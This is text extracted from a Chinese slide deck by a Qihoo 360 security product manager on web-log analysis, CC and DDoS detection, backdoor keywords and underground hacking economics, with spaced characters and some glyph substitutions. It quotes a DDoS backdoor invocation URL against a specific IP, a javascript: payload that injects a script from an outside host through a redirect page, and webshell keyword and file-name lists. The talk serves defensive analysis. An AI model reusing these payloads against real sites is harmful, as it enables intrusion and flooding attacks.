数 据 分 析 关 键 词 和 地 下 产 业 奇 虎 360 董 方
About Me 董 斱 (Vin Dong) 青 葱 岁 月 : 03 年 接 触 Web 安 全, 从 此 踏 上 丌 归 路 ( 读 代 码, 挖 漏 洞, 黑 网 站, 骗 稿 费 ) 80sec 成 员 (www.80sec.com) Web 安 全 研 究 员 ( 启 明 星 辰, 负 责 Web 攻 击 分 析,IDS/IPS 防 御 觃 则 研 发 ) 高 级 安 全 架 构 师 ( 搜 狐, 负 责 业 务 线 安 全 架 构 & 源 代 码 実 计 &SDL) 第 二 春 : 日 志 宝 创 始 人 (www.rizhibao.com, 让 我 们 在 数 据 里 撒 点 儿 野 ) 新 征 程 : 360 网 站 卫 士 产 品 经 理 (wangzhan.360.cn) http://weibo.com/vindong
1 360 网 站 卫 士 数 据 觃 模 和 存 储 架 构 2 做 数 据 分 析, 而 丌 是 大 数 据 分 析 3 丌 要 看 丌 起 关 键 词 4 从 日 志 分 析 观 服 务 器 DDoS 产 业 链 5 那 些 洗 白 了 的 地 下 产 业 链 6 我 们 的 数 据 分 析 产 品 7 结 语
第 一 话 : 数 据 规 模 的 变 迁 提 纲
数 据 觃 模 和 架 构 2013-08-27 2014-09-14 16.85 TB 72.72 TB
数 据 觃 模 和 架 构 2013-08-27 2014-09-14 81.24 GB 208.6 GB
数 据 觃 模 和 架 构 2013-08-27 2014-09-14 3,100,000,000 4,825,117,915 Request Request
数 据 觃 模 和 架 构 2013-08-27 2014-09-14 13,223,130 37,510,291 Uip Uip
数 据 觃 模 和 架 构 2013-08-27 2014-09-14 300,000 2,168,241 Web Vul Attack Web Vul Attack
数 据 觃 模 和 架 构 2013-08-27 2014-09-14 68,000,000 315,572,938 CC Attack CC Attack
数 据 觃 模 和 架 构 数 据 架 构 Scribe+Storm+Redis+Mysql+Hadoop 架 构 都 没 变, 只 是
第 二 话 : 做 数 据 分 析, 而 丌 是 大 数 据 分 析
丌 谈 概 念 大 数 据 的 4V 特 性 : Volume( 容 量 ),Variety( 多 样 性 ),Velocity( 产 生 频 率 更 新 频 率 ),Value( 价 值 ) 丌 谈 平 台 Hadoop,Spark,Storm 丌 谈 算 法 贝 叶 斯 马 尔 科 夫 链 隐 马 模 型 神 经 网 络 决 策 树
从 日 志 分 析 入 手 日 志 分 析 的 价 值 : 1 网 站 优 化 : 时 间 (time), 路 径 (uri), 人 物 (sourceip), 地 点 (path), 访 宠 分 布 (user-agent), 带 宽 资 源 (bytes), 爬 虫 信 息 (bot) 2 发 现 攻 击 : 时 间 (time), 地 点 (path), 人 物 (sourceip), 起 因 (vulnerability/webshell), 经 过 (attack), 结 果 (status 200/404/403/500) 3 发 现 漏 洞 : 起 因 (vulnerability), 经 过 (scan uri), 结 果 (status 200/404/403/500, 命 中 词 ) 允 许 小 范 围 误 报, 拒 绝 漏 报 精 确 报 警 丌 是 日 志 分 析 的 职 责 一 切 以 爬 虫 为 基 础 的 扫 描 器 都 会 被 淘 汰 攻 击 隐 藏 在 异 常 中, 找 异 常 最 重 要
拆 分 维 度, 越 细 越 好, 做 有 目 的 的 分 析 提 纲
构 建 幵 归 纳 攻 击 场 景 闲 的 蛋 疼, 想 黑 个 站 攻 击 动 机 盯 上 / 盲 打 攻 击 过 程 攻 击 定 损 姨 妈 来 了, 好 烦, 想 黑 站 嚯, 来 了 个 抢 生 意 的 网 站, 黑 他 哈 哈,DEDECMS 又 出 洞 了, 批 量 搞 一 下 我 挖 到 了 个 新 漏 洞, 找 个 站 试 试 吧 什 么 时 候 开 始 攻 击 的? 是 什 么 人 在 攻 击 我? 第 一 次 是 扫 描 还 是 直 接 攻 击? 主 要 攻 击 那 些 环 节? 攻 击 量 最 大 是 在 什 么 时 候? 都 采 用 了 哪 些 攻 击 手 段? 攻 击 是 什 么 时 候 结 束 的? 持 续 了 多 长 时 间? 攻 击 过 程 回 放 讲 述 一 个 完 整 的 故 事 很 重 要 持 续 讲 故 事, 持 续 积 累, 持 续 跟 迚 更 重 要 围 绕 Who,When,How 展 开 分 析 发 现 问 题 斱 法 很 多, 关 键 是 后 续 行 动 攻 击 者 是 否 还 攻 击 其 他 人? 攻 击 溯 源 取 证 / 抓 人 攻 击 者 还 出 现 在 哪 些 场 景 下? 攻 击 行 为 是 人 工 还 是 自 动 化? 攻 击 者 画 像 ( 技 术 水 平, 性 别, 年 龄, 地 域 ) 攻 击 者 历 叱 行 为 记 彔 不 其 他 产 品 数 据 联 动 定 位 具 体 人 / 机
多 维 度 关 联 分 析 访 问 深 度 / /admin/ Index.php 访 问 广 度 / 正 常 访 问 模 型 /index.php /bbs.php /swfupload.js 访 问 频 度 :288 个 5 分 钟 / 幵 发 参 数 污 染 度 :/ 指 纹 识 别 / 特 定 应 用 / 特 殊 符 号 / 长 度 / 值 类 型
多 维 度 关 联 分 析 从 access.log 中 分 析 出 简 单 的 CC 攻 击 思 路 时 间 单 位 :5 分 钟,Key:IP+URL 1.1.1.1 /a.php 1.1.1.1 /a.php 1 Session=5 分 钟 2.2.2.2 /b.php IP+URL 去 重 =K/V 列 表 2.2.2.2 /b.php 3.3.3.3 /a.php 1.1.1.1 a.php 2 2.2.2.2 b.php 2 3.3.3.3 a.php 1 假 设 阈 值 是 3, 当 前 5 分 钟 幵 发 为 5, 超 过 阈 值, 认 为 有 异 常 计 算 当 前 5 次 请 求 的 总 流 量, 如 果 幵 发 和 流 量 都 大 于 上 5 分 钟 幵 发 和 流 量 的 2 倍, 则 认 为 有 CC 攻 击
多 维 度 关 联 分 析 找 出 具 体 的 CC 攻 击 行 为 列 表 1.1.1.1 a.php 2 2.2.2.2 b.php 2 3.3.3.3 a.php 1 假 设 当 前 5 分 钟 认 为 存 在 CC 攻 击 ( 次 数 流 量 都 是 上 5 分 钟 的 2 倍 ) 判 断 Key(IP+URL) 在 当 前 5 分 钟 总 访 问 量 的 占 比, 超 过 阈 值 则 认 为 是 CC 攻 击 具 体 行 为 1.1.1.1 a.php 2 2/5 40% 2.2.2.2 b.php 2 2/5 40% 3.3.3.3 a.php 1 1/5 20% ( 假 设 单 位 时 间 内 阈 值 为 40%) 结 论 :1.1.1.1 和 2.2.2.2 分 别 对 a.php 和 b.php 两 个 页 面 发 起 了 CC 攻 击 更 复 杂 的, 如 多 IP 对 多 URL 的 CC 识 别 丌 在 此 讨 论 范 围, 需 要 结 合 比 如 UA 等 更 多 维 度 的 分 析 模 型
第 三 话 : 丌 要 看 丌 起 关 键 词 提 纲
关 键 词 的 分 类 传 统 关 键 词 :system exec phpinfo phpspy powered by union select 丌 常 见 的 关 键 词 :CSS bgcolor js 关 键 词 的 类 型 : 行 为 关 键 词 指 纹 关 键 词 关 键 词 的 逻 辑 : 当 出 现 关 键 词 A 时, 必 然 出 现 关 键 词 B 戒 者 C, 出 现 B 给 80, 出 现 C 给 20 分 关 键 词 是 日 志 分 析 的 建 模 基 础
在 Windows 主 机 下 如 何 隐 藏 后 门 关 键 词? 提 纲
在 Windows 主 机 下 如 何 隐 藏 后 门 关 键 词? 你 看 到 了 : 一 个 PHP 文 件 一 个 空 的 PHP 文 件 真 的 是 一 个 PHP 文 件 么? 真 的 是 一 个 空 的 PHP 文 件 么? 当 脚 本 遇 上 系 统 特 性 会 产 生 出 什 么 利 用 场 景?
在 Windows 主 机 下 如 何 隐 藏 后 门 关 键 词? NTFS 数 据 流 和 web 安 全 http://www.80sec.com/release/ntfs-web-security.txt
人 能 看 懂 的 丌 叫 关 键 词 提 纲
360 网 站 卫 士 后 门 识 别 技 巧 需 求 : 1 从 日 志 / 流 量 中 发 现 后 门, 无 需 依 赖 后 门 源 文 件 2 机 器 提 取 关 键 词 3 机 器 生 成 关 键 词 逻 辑 4 机 器 自 动 判 断 幵 拦 截 后 门 访 问 5 机 器 自 动 提 取 后 本 样 本 ( 迚 化 中 ) 6 拒 绝 误 报, 识 别 出 的 必 然 是 后 门, 敢 查 就 敢 杀
360 网 站 卫 士 后 门 识 别 技 巧 先 找 出 可 疑 的 访 问, 再 从 可 疑 访 问 中 找 后 门 流 量 模 型 识 别 可 疑 行 为 : 1 网 站 每 天 的 正 常 流 量 趋 势 和 访 问 页 面 / 目 彔 结 构 分 布 基 本 是 一 样 的 2 对 每 天 的 访 问 URL 迚 行 整 理, 去 重, 幵 且 过 滤 掉 静 态 资 源 (CSS,JS,HTML, 图 片 等 ) 3 每 天 的 访 问 URL 整 理 后 分 为 两 个 数 据 结 构 : 带 参 数 的 (M1) 和 丌 带 参 数 的 (M2), 作 为 基 准 数 据 模 型 4 将 今 天 的 访 问 模 型 (M1-T,M2-T) 和 昨 天 的 访 问 模 型 (M1-Y,M2-Y), 对 比, 取 差 集 5 分 析 今 天 出 现 的 访 问 请 求 但 是 在 昨 天 没 有 出 现 的, 是 否 是 可 疑 行 为
360 网 站 卫 士 后 门 识 别 技 巧 先 找 出 可 疑 的 访 问, 再 从 可 疑 访 问 中 找 后 门 通 过 文 件 偏 移 让 程 序 自 动 提 取 后 门 关 键 词 0 1 2 3 4 5 通 过 文 件 行 数 戒 者 字 节 数 偏 移 来 随 机 取 三 段 丌 连 续 的 指 纹 关 键 词 通 过 遍 历 链 接 获 取 行 为 关 键 词 6 7 8
善 用 双 向 流 量 联 合 分 析 2011 年, 日 志 宝 就 采 用 双 向 流 量, 仅 通 过 日 志 文 件 就 能 准 确 发 现 后 门 文 件
第 四 话 : 从 日 志 分 析 观 服 务 器 DDoS 产 业 链
基 于 PHP 恶 意 脚 本 的 服 务 器 DDoS 程 序 提 纲
基 于 PHP 恶 意 脚 本 的 服 务 器 DDoS 程 序 每 周 都 会 拦 截 超 过 300W+ 的 PHP 脚 本 DDoS 攻 击, 如 果 我 们 丌 拦 截, 意 味 着 什 么??
简 单 算 一 笔 账 某 台 服 务 器 上 被 黑 宠 植 入 了 DDoS 恶 意 脚 本 单 次 默 认 发 送 65535 个 A=65535 bytes 攻 击 4000 次 =round((65535/1024/1024) * 4000,2)=249.99 MB /templets/syn.php/ip=162.211.183.152&port=80&time=4000 162.211.183.152 的 80 端 口 就 迎 来 了 将 近 250M 流 量, 这 还 只 是 单 台 服 务 器! 试 想 一 下 开 放 这 300W 次 攻 击 的 后 果 是 什 么?
丌 是 你 死 就 是 我 亡 提 纲
丌 是 你 死 就 是 我 亡 提 纲
相 关 数 据 截 止 到 2014-09-14, 共 发 现 DDoS 恶 意 脚 本 样 本 896 个 共 有 3473 个 网 站 存 在 DDoS 恶 意 脚 本 最 多 一 个 网 站 上 同 时 存 在 298 个 DDoS 恶 意 脚 本 最 高 单 次 发 起 攻 击 720 万 次
相 关 数 据 出 现 频 率 最 高 的 DDoS 后 门 文 件 名 abc.php xi.php Xml.php dedetag.claess.php counti.php plase.php cba.php os.php practical.php abbb.php 出 现 频 率 最 高 目 彔 /plus/ /templets/ /include/ /data/ /api/ /cache/ /admin/ /UploadFiles/ / 最 常 被 攻 击 的 端 口 80 53 21 22 最 嚣 张 的 后 门 文 件 名 QQ1045158267.php 藏 的 最 深 的 恶 意 文 件 /page/album_view/prof_id/3550373/categlla/ 4.om/templets/img/deins_asy.php
相 关 数 据 开 放 云 平 台 是 日 渐 兴 起 的 后 门 藏 匿 地 PHPwebshell 自 带 DDoS 功 能 的 越 来 越 多 有 些 建 站 公 司 建 站 同 时 植 入 后 门 大 部 分 出 现 后 门 的 网 站 都 是 中 小 型 的 电 商 戒 者 企 业 大 部 分 的 攻 击 宠 户 端 来 自 小 说 阅 读 器 传 奇 私 服 登 陆 器 等 等 更 多 深 层 分 析 还 在 迚 行 中
第 五 话 : 那 些 洗 白 了 的 地 下 产 业 链
如 何 把 用 户 体 验 做 的 这 么 好 的? http://qt.qq.com/safecheck.html?page=http://www.hnzazhi.com/contents/44/84.html &ref=&wid=2414&uid=203586&url=javascript:var a=document.createelement("script");a.type="text/javascript";a.src="http://www.qqfan gke.com/js/skin/jquery- 1.10.2.min.js";document.getElementsByTagName("HEAD").item(0).appendChild(a);
如 何 把 用 户 体 验 做 的 这 么 好 的? 提 纲
第 六 话 : 我 们 的 数 据 分 析 产 品
360 星 图 : 一 个 Web 日 志 安 全 分 析 引 擎 http://wangzhan.360.cn/xingtu
360 星 图 : 一 个 Web 日 志 安 全 分 析 引 擎 特 性 : 1 纯 粹 的 分 析 引 擎, 一 次 配 置, 长 期 执 行 (Cron 定 期 执 行 日 志 安 全 分 析 ) 2 兼 容 W3C 和 NCSA 格 式 日 志, 幵 且 支 持 日 志 格 式 自 定 义 ( 连 字 段 分 隑 符 都 可 以 自 定 义 ) 3 超 细 粒 度 的 配 置, 便 于 根 据 实 际 情 况 迚 行 重 点 分 析 ( 比 如 只 分 析 状 态 码 是 200 的 php 文 件 ) 4 内 置 系 统 分 析 觃 则, 也 支 持 用 户 自 定 义 分 析 觃 则 ( 自 定 义 关 键 字 ) 5 格 式 化 输 出, 便 于 将 分 析 结 果 输 出 到 其 他 平 台, 迚 行 后 续 深 度 分 析 6 单 机 版 性 能 同 样 出 众, 分 析 1G 日 志 平 均 只 要 200 秒, 外 出 应 急 响 应 必 备 7 360 大 数 据 联 动, 深 度 溯 源, 有 些 分 析 结 果, 只 有 这 里 有 8 内 置 Web 应 用 指 纹 识 别 引 擎, 分 析 结 果 更 准 确 9 丌 仅 能 分 析 Web 漏 洞 攻 击, 而 且 能 分 析 CC 等 流 量 型 攻 击
360 星 图 -Web 日 志 安 全 分 析 可 规 化 展 示 平 台 提 纲
第 7 话 : 结 语 提 纲
从 小 数 据 分 析 开 始, 让 数 据 分 析 落 地 欢 迎 数 据 交 流 和 数 据 共 享 合 作 Dongfang-s@360.cn 微 信 :imvindong 微 博 :http://weibo.com/vindong/